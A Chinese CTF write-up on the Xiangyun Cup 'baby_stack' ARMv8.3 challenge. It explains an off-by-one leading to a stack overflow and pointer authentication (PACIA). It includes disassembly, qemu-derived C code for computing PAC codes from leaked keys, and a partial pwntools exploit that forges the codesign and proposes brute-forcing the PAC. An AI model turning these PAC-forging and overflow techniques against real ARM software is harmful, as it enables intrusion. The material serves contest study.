祥云杯线下 baby_stack 中的 PAC

Posted on Oct 27, 2021

之前的祥云杯线下 AWDp 中碰到了一道 ARMv8.3 的题，题目自身有一个简单的栈溢出漏洞，所以修起来十分容易，到最后被修到每轮只有 72 分，但是直到结束也没有一支队伍攻击成功，我猜测大家应该都是被 PACIA 这个神奇的指令卡住了。暂时不考虑在一个断网的比赛环境里面考这样一个比较冷门的防护合不合适，但就题来说还是挺有意思的，我们队在比赛时虽然成功实现了 protect 函数的绕过，但是之后的 rop 就不会了，一方面是不会绕过第一次的 AUTIASP 检测（不过这个可以爆破，1/256 还是可以接受的），另一方面也的确是不会写 aarch64 的 rop。

漏洞分析

题目拿到手，很容易可以发现 read_n 函数中存在一个 off-by-one

__int64 __fastcall read_n(__int64 a1, unsigned int a2)
{
  __int64 result; // x0
  unsigned __int8 v5; // [xsp+2Bh] [xbp+2Bh] BYREF
  unsigned int i; // [xsp+2Ch] [xbp+2Ch]

  for ( i = 0; ; ++i )
  {
    result = i;
    if ( a2 < i )
      break;
    if ( (int)read(0LL, &v5, 1LL) < 0 )
      exit(0xFFFFFFFFLL);
    result = v5;
    if ( v5 == 10 )
      break;
    *(_BYTE *)(a1 + (int)i) = v5;
  }
  return result;
}

通过这个 off-by-one 最多可以修改 v4 为 0x1FF，在末尾处的 read 中

  puts("Your new data:");
  read(0LL, &v5, v4);

就可以实现栈溢出。修起来比较容易。要实现利用则比较困难，首先，要先绕过一个 protect 函数，如下

    EXPORT protect
    protect

    var_10= -0x10
    var_8= -8

    ; __unwind {
000 SUB             SP, SP, #0x10 ; Rd = Op1 - Op2
010 STR             X0, [SP,#0x10+var_8] ; Store to Memory
010 STR             X1, [SP,#0x10+var_10] ; Store to Memory
010 MOV             X9, SP  ; Rd = Op2
010 MOV             W12, #0x1337 ; Rd = Op2
010 MOV             SP, X12 ; Rd = Op2
010 MOV             X11, #0 ; Rd = Op2
010 LDR             W10, [X0] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 LSR             X10, X10, #0x30 ; '0' ; Logical Shift Right
010 LSL             X11, X11, #8 ; Logical Shift Left
010 ADD             X11, X11, X10 ; Rd = Op1 + Op2
010 LDR             W10, [X0,#4] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 LSR             X10, X10, #0x30 ; '0' ; Logical Shift Right
010 LSL             X11, X11, #8 ; Logical Shift Left
010 ADD             X11, X11, X10 ; Rd = Op1 + Op2
010 MOV             W12, #0x1338 ; Rd = Op2
010 MOV             SP, X12 ; Rd = Op2
010 LDR             W10, [X0,#8] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 LSR             X10, X10, #0x30 ; '0' ; Logical Shift Right
010 LSL             X11, X11, #8 ; Logical Shift Left
010 ADD             X11, X11, X10 ; Rd = Op1 + Op2
010 LDR             W10, [X0,#0xC] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 LSR             X10, X10, #0x30 ; '0' ; Logical Shift Right
010 LSL             X11, X11, #8 ; Logical Shift Left
010 ADD             X11, X11, X10 ; Rd = Op1 + Op2
010 MOV             W12, #0x1339 ; Rd = Op2
010 MOV             SP, X12 ; Rd = Op2
010 LDR             W10, [X0,#0x10] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 LSR             X10, X10, #0x30 ; '0' ; Logical Shift Right
010 LSL             X11, X11, #8 ; Logical Shift Left
010 ADD             X11, X11, X10 ; Rd = Op1 + Op2
010 LDR             W10, [X0,#0x14] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 LSR             X10, X10, #0x30 ; '0' ; Logical Shift Right
010 LSL             X11, X11, #8 ; Logical Shift Left
010 ADD             X11, X11, X10 ; Rd = Op1 + Op2
010 MOV             W12, #0x133A ; Rd = Op2
010 MOV             SP, X12 ; Rd = Op2
010 LDR             W10, [X0,#0x18] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 LSR             X10, X10, #0x30 ; '0' ; Logical Shift Right
010 LSL             X11, X11, #8 ; Logical Shift Left
010 ADD             X11, X11, X10 ; Rd = Op1 + Op2
010 LDR             W10, [X0,#0x1C] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 LSR             X10, X10, #0x30 ; '0' ; Logical Shift Right
010 LSL             X11, X11, #8 ; Logical Shift Left
010 ADD             X11, X11, X10 ; Rd = Op1 + Op2
010 STR             X11, [X1] ; Store to Memory
010 MOV             SP, X9  ; Rd = Op2
010 PACIA           X10, SP ; Pointer Authentication Code for address
010 ADD             SP, SP, #0x10 ; Rd = Op1 + Op2
000 RET                     ; Return from Subroutine
    ; } // starts at 400860
    ; End of function protect

PAC 机制

这里面比较奇怪的就是 PACIA 这个指令了，IDA 的 auto comment 中只写到指令功能为 “Pointer Authentication Code for address”，比赛期间我们通过 qemu 的源码大体搞清楚了它在做什么，赛后查了查资料，引用原文

The basic idea behind Pointer Authentication is that the actual address space in 64-bit architectures is less than 64-bits. There are unused bits in pointer values that we can use to place a Pointer Authentication Code (PAC) for this pointer. We could insert a PAC into each pointer we want to protect before writing it to memory, and verify its integrity before using it. An attacker who wants to modify a protected pointer would have to find/guess the correct PAC to be able to control the program flow.

散装地翻译一下，就是 PAC 利用了 64 位程序的地址不会使用所有 64 bit 的特点，在指针被存入内存前（比如函数调用时返回地址被压入栈前），在这些未被使用的位上加上一个 PAC 码，当下一次使用它时，再验证 PAC 码的正确性。如此，攻击者就必须找出或猜出 PAC 的值才能控制程序执行流。

为了实现计算出 PAC 码，需要 data（64-bit），modifier（64-bit），key（128-bit，由两个 64-bit 的 key 组成）。key 应当由高特权级维护，储存于内部寄存器中，EL0（user mode，类似于 x86 中的 ring3）无权访问。同时为了让每次加密生成的 PAC 码随机化，modifier 也需要相对随机，在对返回地址加密时，一般使用栈指针 sp。

PACIA 属于 PAC* 指令族，类似的还有 PACIASP，PACIA 接受两个参数，即 PACIA data, modifier，PACIASP 仅接受一个参数，即 PACIASP data，使用 sp 做 modifier。

从加密的角度上来看，为了生成可用的 PAC 码，需要有一个足够轻量化又足够强的加密算法，似乎现有的加密算法都不太适合，所以开发者发明了 QARMA 这样一个加密算法来生成，对于加密而言，本人并未研究密码学，暂时不考虑加密算法本身的漏洞。

那么对于 PAC 机制的攻击，最理想的情况是 leak 出 key 和 modifier，由于加密算法是公开的，此时可以直接算出对应的 PAC 码。

回到题目，这道题在连接远程环境时，会直接把两个 key 给我们。

我们再来看 protect 中的加密

010 MOV             W12, #0x1337 ; Rd = Op2
010 MOV             SP, X12 ; Rd = Op2
010 MOV             X11, #0 ; Rd = Op2
010 LDR             W10, [X0] ; Load from Memory
010 PACIA           X10, SP ; Pointer Authentication Code for address

这里的 X10 就是 data，SP 就是 modifier。那么 protect 的加密过程就是根据输入的字符串，四个字节一组，使用硬编码的 modifier 进行加密，加密 8 次。

由于有了 key，modifier 也已知，所以我们可以直接绕过。为了计算，比赛的时候学长根据 qemu 源码写了一个对拍程序

#include<stdio.h>
#include<stdint.h>
#include<assert.h>
#include<string.h>
#include<stdlib.h>
#define MAKE_64BIT_MASK(shift, length) \
    (((~0ULL) >> (64 - (length))) << (shift))

static inline uint64_t deposit64(uint64_t value, int start, int length,
                                 uint64_t fieldval)
{
    uint64_t mask;
    assert(start >= 0 && length > 0 && length <= 64 - start);
    mask = (~0ULL >> (64 - length)) << start;
    return (value & ~mask) | ((fieldval << start) & mask);
}

static inline int64_t sextract64(uint64_t value, int start, int length)
{
    assert(start >= 0 && length > 0 && length <= 64 - start);
    /* Note that this implementation relies on right shift of signed
     * integers being an arithmetic shift.
     */
    return ((int64_t)(value << (64 - length - start))) >> (64 - length);
}

static inline uint32_t extract32(uint32_t value, int start, int length)
{
    assert(start >= 0 && length > 0 && length <= 32 - start);
    return (value >> start) & (~0U >> (32 - length));
}

static int rot_cell(int cell, int n)
{
    /* 4-bit rotate left by n.  */
    cell |= cell << 4;
    return extract32(cell, 4 - n, 4);
}


static inline uint64_t extract64(uint64_t value, int start, int length)
{
    assert(start >= 0 && length > 0 && length <= 64 - start);
    return (value >> start) & (~0ULL >> (64 - length));
}

static uint64_t pac_cell_shuffle(uint64_t i)
{
    uint64_t o = 0;

    o |= extract64(i, 52, 4);
    o |= extract64(i, 24, 4) << 4;
    o |= extract64(i, 44, 4) << 8;
    o |= extract64(i,  0, 4) << 12;

    o |= extract64(i, 28, 4) << 16;
    o |= extract64(i, 48, 4) << 20;
    o |= extract64(i,  4, 4) << 24;
    o |= extract64(i, 40, 4) << 28;

    o |= extract64(i, 32, 4) << 32;
    o |= extract64(i, 12, 4) << 36;
    o |= extract64(i, 56, 4) << 40;
    o |= extract64(i, 20, 4) << 44;

    o |= extract64(i,  8, 4) << 48;
    o |= extract64(i, 36, 4) << 52;
    o |= extract64(i, 16, 4) << 56;
    o |= extract64(i, 60, 4) << 60;

    return o;
}


static uint64_t pac_cell_inv_shuffle(uint64_t i)
{
    uint64_t o = 0;

    o |= extract64(i, 12, 4);
    o |= extract64(i, 24, 4) << 4;
    o |= extract64(i, 48, 4) << 8;
    o |= extract64(i, 36, 4) << 12;

    o |= extract64(i, 56, 4) << 16;
    o |= extract64(i, 44, 4) << 20;
    o |= extract64(i,  4, 4) << 24;
    o |= extract64(i, 16, 4) << 28;

    o |= i & MAKE_64BIT_MASK(32, 4);
    o |= extract64(i, 52, 4) << 36;
    o |= extract64(i, 28, 4) << 40;
    o |= extract64(i,  8, 4) << 44;

    o |= extract64(i, 20, 4) << 48;
    o |= extract64(i,  0, 4) << 52;
    o |= extract64(i, 40, 4) << 56;
    o |= i & MAKE_64BIT_MASK(60, 4);

    return o;
}

static uint64_t pac_sub(uint64_t i)
{
    static const uint8_t sub[16] = {
        0xb, 0x6, 0x8, 0xf, 0xc, 0x0, 0x9, 0xe,
        0x3, 0x7, 0x4, 0x5, 0xd, 0x2, 0x1, 0xa,
    };
    uint64_t o = 0;
    int b;

    for (b = 0; b < 64; b += 4) {
        o |= (uint64_t)sub[(i >> b) & 0xf] << b;
    }
    return o;
}

static uint64_t pac_inv_sub(uint64_t i)
{
    static const uint8_t inv_sub[16] = {
        0x5, 0xe, 0xd, 0x8, 0xa, 0xb, 0x1, 0x9,
        0x2, 0x6, 0xf, 0x0, 0x4, 0xc, 0x7, 0x3,
    };
    uint64_t o = 0;
    int b;

    for (b = 0; b < 64; b += 4) {
        o |= (uint64_t)inv_sub[(i >> b) & 0xf] << b;
    }
    return o;
}


static uint64_t pac_mult(uint64_t i)
{
    uint64_t o = 0;
    int b;

    for (b = 0; b < 4 * 4; b += 4) {
        int i0, i4, i8, ic, t0, t1, t2, t3;

        i0 = extract64(i, b, 4);
        i4 = extract64(i, b + 4 * 4, 4);
        i8 = extract64(i, b + 8 * 4, 4);
        ic = extract64(i, b + 12 * 4, 4);

        t0 = rot_cell(i8, 1) ^ rot_cell(i4, 2) ^ rot_cell(i0, 1);
        t1 = rot_cell(ic, 1) ^ rot_cell(i4, 1) ^ rot_cell(i0, 2);
        t2 = rot_cell(ic, 2) ^ rot_cell(i8, 1) ^ rot_cell(i0, 1);
        t3 = rot_cell(ic, 1) ^ rot_cell(i8, 2) ^ rot_cell(i4, 1);

        o |= (uint64_t)t3 << b;
        o |= (uint64_t)t2 << (b + 4 * 4);
        o |= (uint64_t)t1 << (b + 8 * 4);
        o |= (uint64_t)t0 << (b + 12 * 4);
    }
    return o;
}

static uint64_t tweak_cell_rot(uint64_t cell)
{
    return (cell >> 1) | (((cell ^ (cell >> 1)) & 1) << 3);
}

static uint64_t tweak_shuffle(uint64_t i)
{
    uint64_t o = 0;

    o |= extract64(i, 16, 4) << 0;
    o |= extract64(i, 20, 4) << 4;
    o |= tweak_cell_rot(extract64(i, 24, 4)) << 8;
    o |= extract64(i, 28, 4) << 12;

    o |= tweak_cell_rot(extract64(i, 44, 4)) << 16;
    o |= extract64(i,  8, 4) << 20;
    o |= extract64(i, 12, 4) << 24;
    o |= tweak_cell_rot(extract64(i, 32, 4)) << 28;

    o |= extract64(i, 48, 4) << 32;
    o |= extract64(i, 52, 4) << 36;
    o |= extract64(i, 56, 4) << 40;
    o |= tweak_cell_rot(extract64(i, 60, 4)) << 44;

    o |= tweak_cell_rot(extract64(i,  0, 4)) << 48;
    o |= extract64(i,  4, 4) << 52;
    o |= tweak_cell_rot(extract64(i, 40, 4)) << 56;
    o |= tweak_cell_rot(extract64(i, 36, 4)) << 60;

    return o;
}

static uint64_t tweak_cell_inv_rot(uint64_t cell)
{
    return ((cell << 1) & 0xf) | ((cell & 1) ^ (cell >> 3));
}

static uint64_t tweak_inv_shuffle(uint64_t i)
{
    uint64_t o = 0;

    o |= tweak_cell_inv_rot(extract64(i, 48, 4));
    o |= extract64(i, 52, 4) << 4;
    o |= extract64(i, 20, 4) << 8;
    o |= extract64(i, 24, 4) << 12;

    o |= extract64(i,  0, 4) << 16;
    o |= extract64(i,  4, 4) << 20;
    o |= tweak_cell_inv_rot(extract64(i,  8, 4)) << 24;
    o |= extract64(i, 12, 4) << 28;

    o |= tweak_cell_inv_rot(extract64(i, 28, 4)) << 32;
    o |= tweak_cell_inv_rot(extract64(i, 60, 4)) << 36;
    o |= tweak_cell_inv_rot(extract64(i, 56, 4)) << 40;
    o |= tweak_cell_inv_rot(extract64(i, 16, 4)) << 44;

    o |= extract64(i, 32, 4) << 48;
    o |= extract64(i, 36, 4) << 52;
    o |= extract64(i, 40, 4) << 56;
    o |= tweak_cell_inv_rot(extract64(i, 44, 4)) << 60;

    return o;
}


static uint64_t pauth_computepac_architected(uint64_t data, uint64_t modifier,
                                             uint64_t key0, uint64_t key1)
{
    static const uint64_t RC[5] = {
        0x0000000000000000ull,
        0x13198A2E03707344ull,
        0xA4093822299F31D0ull,
        0x082EFA98EC4E6C89ull,
        0x452821E638D01377ull,
    };
    const uint64_t alpha = 0xC0AC29B7C97C50DDull;
    /*
     * Note that in the ARM pseudocode, key0 contains bits <127:64>
     * and key1 contains bits <63:0> of the 128-bit key.
     */
    uint64_t workingval, runningmod, roundkey, modk0;
    int i;

    modk0 = (key0 << 63) | ((key0 >> 1) ^ (key0 >> 63));
    runningmod = modifier;
    workingval = data ^ key0;

    for (i = 0; i <= 4; ++i) {
        roundkey = key1 ^ runningmod;
        workingval ^= roundkey;
        workingval ^= RC[i];
        if (i > 0) {
            workingval = pac_cell_shuffle(workingval);
            workingval = pac_mult(workingval);
        }
        workingval = pac_sub(workingval);
        runningmod = tweak_shuffle(runningmod);
    }
    roundkey = modk0 ^ runningmod;
    workingval ^= roundkey;
    workingval = pac_cell_shuffle(workingval);
    workingval = pac_mult(workingval);
    workingval = pac_sub(workingval);
    workingval = pac_cell_shuffle(workingval);
    workingval = pac_mult(workingval);
    workingval ^= key1;
    workingval = pac_cell_inv_shuffle(workingval);
    workingval = pac_inv_sub(workingval);
    workingval = pac_mult(workingval);
    workingval = pac_cell_inv_shuffle(workingval);
    workingval ^= key0;
    workingval ^= runningmod;
    for (i = 0; i <= 4; ++i) {
        workingval = pac_inv_sub(workingval);
        if (i < 4) {
            workingval = pac_mult(workingval);
            workingval = pac_cell_inv_shuffle(workingval);
        }
        runningmod = tweak_inv_shuffle(runningmod);
        roundkey = key1 ^ runningmod;
        workingval ^= RC[4 - i];
        workingval ^= roundkey;
        workingval ^= alpha;
    }
    workingval ^= modk0;

    return workingval;
}



int main(int argc, char** argv) {
    uint64_t api1, api2;
    sscanf(argv[1], "%llx", &api1);
    sscanf(argv[2], "%llx", &api2);
    uint64_t pc = atoll(argv[3]);
    uint64_t sp = atoll(argv[4]);
    uint64_t ext = sextract64(pc, 55, 1);
    uint64_t ext_ptr = deposit64(pc, 48, 56 - 48, ext);
        uint64_t ans =          pauth_computepac_architected(ext_ptr, sp,
                        api1,api2)&0x00ff000000000000 | pc;
    uint64_t test = sextract64(pc, 48, 56 - 48);
    if (test != 0 && test != -1)
    {
        ans ^= MAKE_64BIT_MASK(56 - 2, 1);
    }
    ans &= MAKE_64BIT_MASK(48, 7);

    ext &= MAKE_64BIT_MASK(55, 1);

    printf("%llx\n", ans | ext | pc);
//      printf("%llx\n", 
//                      pauth_computepac_architected(pc, sp,
//                      api1,api2));
}

然后我们在攻击的时候直接通过该程序计算即可

#!/usr/bin/env python
# coding=utf-8
from pwn import *
import os
import subprocess
context.log_level = "debug"
context.terminal = ["tmux", "splitw", "-h"]

#sh = process("./pwn")
sh = process(["qemu-aarch64", "-g", "2222", "-L", "./quiet-aarch64/aarch642.0", "./pwn-patched"])

elf = ELF("./pwn")
#sh = process(["qemu-aarch64", "-L", "./quiet-aarch64/aarch642.0", "./pwn"])

key1 = 0
key2 = 0

def calc_sign(sp):
    p = subprocess.Popen(["./a", hex(key2), hex(key1), str(0x61616161), str(sp)], stdout = subprocess.PIPE)
    sleep(0.2)
    ans = int(p.stdout.read(), base = 16)
    print hex(ans)
    p.terminate()
    return ((ans) >> 48)

def calc_addr(sp, pc):
    p = subprocess.Popen(["./a", hex(key2), hex(key1), str(pc), str(sp)], stdout = subprocess.PIPE)
    sleep(0.2)
    ans = int(p.stdout.read(), base = 16)
    print hex(ans)
    p.terminate()
    return ((ans) >> 48)

sh.recvuntil("[+] YOUR GIFT APIA KEY: ")
key1 = int(sh.recvuntil(',', drop = True), base = 16)
key2 = int(sh.recvuntil('\n', drop = True), base = 16)
log.success(hex(key1))
log.success(hex(key2))

codesign = 0
for i in range(4):
    codesign = codesign + calc_sign(0x1337 + i)
    codesign = codesign << 8
    codesign = codesign + calc_sign(0x1337 + i)
    codesign = codesign << 8
codesign = codesign >> 8
log.success("sign: " + hex(codesign))


sh.sendlineafter("length:", str(256))
#sh.sendlineafter("Data:", 'a' * 0x100)
sh.sendafter("Data:", "a".ljust(0x100, 'a') + '\xFF')

sh.sendafter("[0/1]", '1')
sh.sendafter("codesign:", p64(codesign) + '\x00')

sh.recvuntil("Your old data")

如此即可到达栈溢出漏洞点。

到达栈溢出点后，开始 rop 的第一个返回地址要先通过一个 AUTIASP，可是此处的 sp 不可预知。我们没有想到比较好的方法，选择直接爆破 PAC 码，因为没有开启 PIE，所以所有地址有效位都不超过 32， PAC 码仅有 8 位，爆破概率 1/256，通过这个之后，就是普通的 rop 了。遗憾的是我们当时并没有写出可用的 rop 链，因为 aarch64 的 gadget 都比较难以使用。

reference

https://www.qualcomm.com/media/documents/files/whitepaper-pointer-authentication-on-armv8-3.pdf